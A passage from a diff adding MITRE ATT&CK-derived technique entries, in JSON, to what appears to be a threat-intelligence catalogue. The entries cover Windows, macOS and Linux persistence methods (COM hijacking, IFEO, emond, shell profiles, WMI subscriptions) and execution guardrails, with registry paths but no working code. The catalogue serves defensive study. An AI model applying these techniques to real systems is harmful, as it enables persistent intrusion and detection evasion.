"9cfbe3ba-957e-49fd-9494-9870e5d0ae16", + "value": "Change Default File Association" + }, + { + "description": "Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.[[Microsoft Component Object Model](https://app.tidalcyber.com/references/e1bb3872-7748-4e64-818f-6187a20d59f0)] References to various COM objects are stored in the Registry. \n\nAdversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.[[GDATA COM Hijacking](https://app.tidalcyber.com/references/98e88505-b916-430d-aef6-616ba7ddd88e)] An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1546.015" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "3e1ef5ba-6426-4fe0-ad48-78557667d680", + "value": "Component Object Model Hijacking" + }, + { + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place.\n\nThe rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.[[xorrior emond Jan 2018](https://app.tidalcyber.com/references/b49649ec-28f0-4d30-ab6c-13b12fca36e8)][[magnusviri emond Apr 2016](https://app.tidalcyber.com/references/373f64a5-a30f-4b6e-b352-d0c6f8b65fdb)][[sentinelone macos persist Jun 2019](https://app.tidalcyber.com/references/81a49043-cac5-40e0-a626-fd242d21c56d)]\n\nAdversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.[[xorrior emond Jan 2018](https://app.tidalcyber.com/references/b49649ec-28f0-4d30-ab6c-13b12fca36e8)][[magnusviri emond Apr 2016](https://app.tidalcyber.com/references/373f64a5-a30f-4b6e-b352-d0c6f8b65fdb)][[sentinelone macos persist Jun 2019](https://app.tidalcyber.com/references/81a49043-cac5-40e0-a626-fd242d21c56d)] Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) service.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1546.014" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "7f9dbafd-4c7e-4bd9-8aff-c2a800743a07", + "value": "Emond" + }, + { + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\\dbg\\ntsd.exe -g notepad.exe). [[Microsoft Dev Blog IFEO Mar 2010](https://app.tidalcyber.com/references/4c62c2cb-bee2-4fc0-aa81-65d66e71a5c2)]\n\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. [[Microsoft GFlags Mar 2017](https://app.tidalcyber.com/references/9c11c382-b420-4cf9-9db2-eaa7b60aee2d)] IFEOs are represented as Debugger values in the Registry under HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ where <executable> is the binary on which the debugger is attached. [[Microsoft Dev Blog IFEO Mar 2010](https://app.tidalcyber.com/references/4c62c2cb-bee2-4fc0-aa81-65d66e71a5c2)]\n\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). [[Microsoft Silent Process Exit NOV 2017](https://app.tidalcyber.com/references/86896031-f654-4185-ba45-8c931903153b)] [[Oddvar Moe IFEO APR 2018](https://app.tidalcyber.com/references/8661b51c-ddb7-484f-919d-22079c39d1e4)] Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\. [[Microsoft Silent Process Exit NOV 2017](https://app.tidalcyber.com/references/86896031-f654-4185-ba45-8c931903153b)] [[Oddvar Moe IFEO APR 2018](https://app.tidalcyber.com/references/8661b51c-ddb7-484f-919d-22079c39d1e4)]\n\nSimilar to [Accessibility Features](https://app.tidalcyber.com/technique/9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures \"cmd.exe,\" or another program that provides backdoor access, as a \"debugger\" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2) will cause the \"debugger\" program to be executed with SYSTEM privileges. [[Tilbury 2014](https://app.tidalcyber.com/references/136325ee-0712-49dd-b3ab-a6f2bfb218b0)]\n\nSimilar to [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. [[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)] Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.\n\nMalware may also use IFEO to [Impair Defenses](https://app.tidalcyber.com/technique/e3be3d76-0a36-4060-8003-3b39c557f728) by registering invalid debuggers that redirect and effectively disable various system and security applications. [[FSecure Hupigon](https://app.tidalcyber.com/references/08ceb57f-065e-45e9-98e9-d58a92caa755)] [[Symantec Ushedix June 2008](https://app.tidalcyber.com/references/9df2b407-df20-403b-ba1b-a681b9c74c7e)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1546.012" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "91d813d3-c17c-4c4c-b86e-0667f669a2f4", + "value": "Image File Execution Options Injection" + }, + { + "description": "Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.[[Installer Package Scripting Rich Trouton](https://app.tidalcyber.com/references/7a877b67-ac4b-4d82-860a-75b5f0b8daae)]\n\nUsing legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27)) with the elevated permissions.[[Application Bundle Manipulation Brandon Dalton](https://app.tidalcyber.com/references/2a8fd573-6ab0-403b-b813-88d9d3edab36)][[wardle evilquest parti](https://app.tidalcyber.com/references/1ebd91db-9b56-442f-bb61-9e154b5966ac)]\n\nDepending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed.\n\nFor Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. Adversaries have leveraged `Prebuild` and `Postbuild` events to run commands before or after a build when installing .msi files.[[Windows AppleJeus GReAT](https://app.tidalcyber.com/references/336ea5f5-d8cc-4af5-9aa0-203e319b3c28)][[Debian Manual Maintainer Scripts](https://app.tidalcyber.com/references/e32e293a-f583-494e-9eb5-c82167f2e000)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1546.016" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "8b8c0f91-17fb-41fe-905c-9cbf45593877", + "value": "Installer Packages" + }, + { + "description": "Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.[[Writing Bad Malware for OSX](https://app.tidalcyber.com/references/5628ecd9-48da-4a50-94ba-4b70abe56089)] There are tools available to perform these changes.\n\nAdversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.[[Malware Persistence on OS X](https://app.tidalcyber.com/references/d4e3b066-c439-4284-ba28-3b8bd8ec270e)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1546.006" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "cd52d338-ba23-43c8-975d-4db29aa96598", + "value": "LC_LOAD_DYLIB Addition" + }, + { + "description": "Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.[[TechNet Netsh](https://app.tidalcyber.com/references/58112a3a-06bd-4a46-8a09-4dba5f42a04f)] The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\\SOFTWARE\\Microsoft\\Netsh.\n\nAdversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.[[Github Netsh Helper CS Beacon](https://app.tidalcyber.com/references/c3169722-9c32-4a38-a7fe-8d4b6e51ca36)][[Demaske Netsh Persistence](https://app.tidalcyber.com/references/663b3fd6-0dd6-45c8-afba-dc0ea6d331b5)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1546.007" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "b2cae050-4916-44c0-a6a3-3fa257145872", + "value": "Netsh Helper DLL" + }, + { + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) is a script that runs when [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) starts and can be used as a logon script to customize user environments.\n\n[PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. [[Microsoft About Profiles](https://app.tidalcyber.com/references/1da63665-7a96-4bc3-9606-a3575b913819)] \n\nAdversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) drives to gain persistence. Every time a user opens a [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) session the modified script will be executed unless the -NoProfile flag is used when it is launched. [[ESET Turla PowerShell May 2019](https://app.tidalcyber.com/references/68c0f34b-691a-4847-8d49-f18b7f4e5188)] \n\nAn adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. [[Wits End and Shady PowerShell Profiles](https://app.tidalcyber.com/references/8fcbd99a-1fb8-4ca3-9efd-a98734d4397d)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1546.013" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "6e65f84b-cfad-49ce-9072-f2966dc02f56", + "value": "PowerShell Profile" + }, + { + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.[[Wikipedia Screensaver](https://app.tidalcyber.com/references/b5d69465-27df-4acc-b6cc-f51be8780b7b)] The Windows screensaver application scrnsave.scr is located in C:\\Windows\\System32\\, and C:\\Windows\\sysWOW64\\ on 64-bit Windows systems, along with screensavers included with base Windows installations.\n\nThe following screensaver settings are stored in the Registry (HKCU\\Control Panel\\Desktop\\) and could be manipulated to achieve persistence:\n\n* SCRNSAVE.exe - set to malicious PE path\n* ScreenSaveActive - set to '1' to enable the screensaver\n* ScreenSaverIsSecure - set to '0' to not require a password to unlock\n* ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed\n\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.[[ESET Gazer Aug 2017](https://app.tidalcyber.com/references/9d1c40af-d4bc-4d4a-b667-a17378942685)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1546.002" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "3f9cd334-0b86-478f-97fa-c3aedd8035d8", + "value": "Screensaver" + }, + { + "description": "Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d.\n\nAdversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where \"command list\" will be executed when \"signals\" are received.[[Trap Manual](https://app.tidalcyber.com/references/143462e1-b7e8-4e18-9cb1-6f4f3969e891)][[Cyberciti Trap Statements](https://app.tidalcyber.com/references/24cf5471-f327-4407-b32f-055537f3495e)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1546.005" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "82c07e34-9f67-4f4e-a513-c22a17b508e5", + "value": "Trap" + }, + { + "description": "Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://app.tidalcyber.com/technique/3eafcd8b-0cb8-4d23-8785-3f80a3c897c7)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. \n\nAdversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files.[[intezer-kaiji-malware](https://app.tidalcyber.com/references/ef1fbb40-da6f-41d0-a44a-9ff444e2ad89)][[bencane blog bashrc](https://app.tidalcyber.com/references/503a4cd6-5cfe-4cce-b363-0cf3c8bc9feb)] These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile which are sourced when a user opens a command-line interface or connects remotely.[[anomali-rocke-tactics](https://app.tidalcyber.com/references/2308c5ca-04a4-43c5-b92b-ffa6a60ae3a9)][[Linux manual bash invocation](https://app.tidalcyber.com/references/06185cbd-6635-46c7-9783-67bd8742b66f)] Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.[[Tsunami](https://app.tidalcyber.com/references/95b5b03e-f160-47cf-920c-8f4f3d4114a3)][[anomali-rocke-tactics](https://app.tidalcyber.com/references/2308c5ca-04a4-43c5-b92b-ffa6a60ae3a9)][[anomali-linux-rabbit](https://app.tidalcyber.com/references/ec413dc7-028c-4153-9e98-abe85961747f)][[Magento](https://app.tidalcyber.com/references/b8b3f360-e14c-49ea-a4e5-8d6d9727e731)] Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session. \n\nFor macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.[[ScriptingOSX zsh](https://app.tidalcyber.com/references/08b390aa-863b-420e-9b00-e168e3c756d8)][[PersistentJXA_leopitt](https://app.tidalcyber.com/references/2d66932e-1b73-4255-a9a8-ea8effb3a776)][[code_persistence_zsh](https://app.tidalcyber.com/references/b76d3ed0-e484-4ed1-aa6b-892a6f34e478)][[macOS MS office sandbox escape](https://app.tidalcyber.com/references/759e81c1-a250-440e-8b52-178bcf5451b9)] The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1546.004" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "cc5ae19f-981d-4004-bb74-260b8ebad73a", + "value": "Unix Shell Configuration Modification" + }, + { + "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime.[[Mandiant M-Trends 2015](https://app.tidalcyber.com/references/067497eb-17d9-465f-a070-495575f420d7)]\n\nAdversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.[[FireEye WMI SANS 2015](https://app.tidalcyber.com/references/a9333ef5-5637-4a4c-9aaf-fdc9daf8b860)][[FireEye WMI 2015](https://app.tidalcyber.com/references/135ccd72-2714-4453-9c8f-f5fde31905ee)] Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.[[Dell WMI Persistence](https://app.tidalcyber.com/references/a88dd548-ac8f-4297-9e23-de2643294846)][[Microsoft MOF May 2018](https://app.tidalcyber.com/references/1d1da9ad-c995-4040-8103-b51af9d8bac3)]\n\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1546.003" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "043ffb62-dacd-4e21-9c86-b31826176283", + "value": "Windows Management Instrumentation Event Subscription" + }, + { + "description": "Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.[[Backdooring an AWS account](https://app.tidalcyber.com/references/2c867527-1584-44f7-b5e5-8ca54ea79619)][[Varonis Power Automate Data Exfiltration](https://app.tidalcyber.com/references/16436468-1daf-433d-bb3b-f842119594b4)][[Microsoft DART Case Report 001](https://app.tidalcyber.com/references/bd8c6a86-1a63-49cd-a97f-3d119e4223d4)]\n\nAdversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.[[FireEye WMI 2015](https://app.tidalcyber.com/references/135ccd72-2714-4453-9c8f-f5fde31905ee)][[Malware Persistence on OS X](https://app.tidalcyber.com/references/d4e3b066-c439-4284-ba28-3b8bd8ec270e)][[amnesia malware](https://app.tidalcyber.com/references/489a6c57-f64c-423b-a7bd-169fa36c4cdf)]\n\nSince the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. ", + "meta": { + "platforms": [ + "IaaS", + "Linux", + "macOS", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba", + "type": "similar" + }, + { + "dest-uuid": "4216058d-0912-4ff3-a7fd-dd7a7b346c96", + "type": "similar" + }, + { + "dest-uuid": "36b58363-ca6a-4614-bf6f-bfaecafedb5f", + "type": "similar" + }, + { + "dest-uuid": "efbbe9d1-274c-4383-9c6c-44bd4eca1829", + "type": "similar" + }, + { + "dest-uuid": "9cfbe3ba-957e-49fd-9494-9870e5d0ae16", + "type": "similar" + }, + { + "dest-uuid": "3e1ef5ba-6426-4fe0-ad48-78557667d680", + "type": "similar" + }, + { + "dest-uuid": "7f9dbafd-4c7e-4bd9-8aff-c2a800743a07", + "type": "similar" + }, + { + "dest-uuid": "91d813d3-c17c-4c4c-b86e-0667f669a2f4", + "type": "similar" + }, + { + "dest-uuid": "8b8c0f91-17fb-41fe-905c-9cbf45593877", + "type": "similar" + }, + { + "dest-uuid": "cd52d338-ba23-43c8-975d-4db29aa96598", + "type": "similar" + }, + { + "dest-uuid": "b2cae050-4916-44c0-a6a3-3fa257145872", + "type": "similar" + }, + { + "dest-uuid": "6e65f84b-cfad-49ce-9072-f2966dc02f56", + "type": "similar" + }, + { + "dest-uuid": "3f9cd334-0b86-478f-97fa-c3aedd8035d8", + "type": "similar" + }, + { + "dest-uuid": "82c07e34-9f67-4f4e-a513-c22a17b508e5", + "type": "similar" + }, + { + "dest-uuid": "cc5ae19f-981d-4004-bb74-260b8ebad73a", + "type": "similar" + }, + { + "dest-uuid": "043ffb62-dacd-4e21-9c86-b31826176283", + "type": "similar" + } + ], + "uuid": "e1e42979-d3cd-461b-afc4-a6373cbf97ba", + "value": "Event Triggered Execution" + }, + { + "description": "Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://app.tidalcyber.com/technique/aca9cbac-5c11-4050-8d9c-2a947c89a1e8) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.[[EK Clueless Agents](https://app.tidalcyber.com/references/ef7409d2-af39-4ad8-8469-76f0165687bd)]\n\nValues can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.[[Kaspersky Gauss Whitepaper](https://app.tidalcyber.com/references/4bf39390-f3ca-4132-841e-b35abefe7dee)][[Proofpoint Router Malvertising](https://app.tidalcyber.com/references/b964139f-7c02-451d-8d22-a87975e60aa2)][[EK Impeding Malware Analysis](https://app.tidalcyber.com/references/c3e6c8da-1399-419c-96f5-7dade6fccd29)][[Environmental Keyed HTA](https://app.tidalcyber.com/references/b16bae1a-75aa-478b-b8c7-458ee5a3f7e5)][[Ebowla: Genetic Malware](https://app.tidalcyber.com/references/8c65dbc1-33ad-470c-b172-7497c6fd2480)] By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.[[Kaspersky Gauss Whitepaper](https://app.tidalcyber.com/references/4bf39390-f3ca-4132-841e-b35abefe7dee)][[Ebowla: Genetic Malware](https://app.tidalcyber.com/references/8c65dbc1-33ad-470c-b172-7497c6fd2480)] These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files or Information](https://app.tidalcyber.com/technique/046cc07e-8700-4536-9c5b-6ecb384f52b0), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.[[Kaspersky Gauss Whitepaper](https://app.tidalcyber.com/references/4bf39390-f3ca-4132-841e-b35abefe7dee)][[EK Impeding Malware Analysis](https://app.tidalcyber.com/references/c3e6c8da-1399-419c-96f5-7dade6fccd29)][[Environmental Keyed HTA](https://app.tidalcyber.com/references/b16bae1a-75aa-478b-b8c7-458ee5a3f7e5)][[Ebowla: Genetic Malware](https://app.tidalcyber.com/references/8c65dbc1-33ad-470c-b172-7497c6fd2480)][[Demiguise Guardrail Router Logo](https://app.tidalcyber.com/references/2e55d33a-fe75-4397-b6f0-a28d397b4c24)] By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.[[Kaspersky Gauss Whitepaper](https://app.tidalcyber.com/references/4bf39390-f3ca-4132-841e-b35abefe7dee)] This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\n\nLike other [Execution Guardrails](https://app.tidalcyber.com/technique/aca9cbac-5c11-4050-8d9c-2a947c89a1e8), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8). While use of [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1480.001" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "ac10844f-e4ab-44a2-97b4-3d74a1fc046c", + "value": "Environmental Keying" + }, + { + "description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.[[FireEye Kevin Mandia Guardrails](https://app.tidalcyber.com/references/0c518eec-a94e-42a7-8eb7-527ae3e279b6)] Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.[[FireEye Outlook Dec 2019](https://app.tidalcyber.com/references/f23a773f-9c50-4193-877d-97f7c13f48f1)]\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8). While use of [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "ac10844f-e4ab-44a2-97b4-3d74a1fc046c", + "type": "similar" + } + ], + "uuid": "aca9cbac-5c11-4050-8d9c-2a947c89a1e8", + "value": "Execution Guardrails" + }, + { + "description": "Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAsymmetric encryption algorithms are those that use different keys on each end of the channel. Also 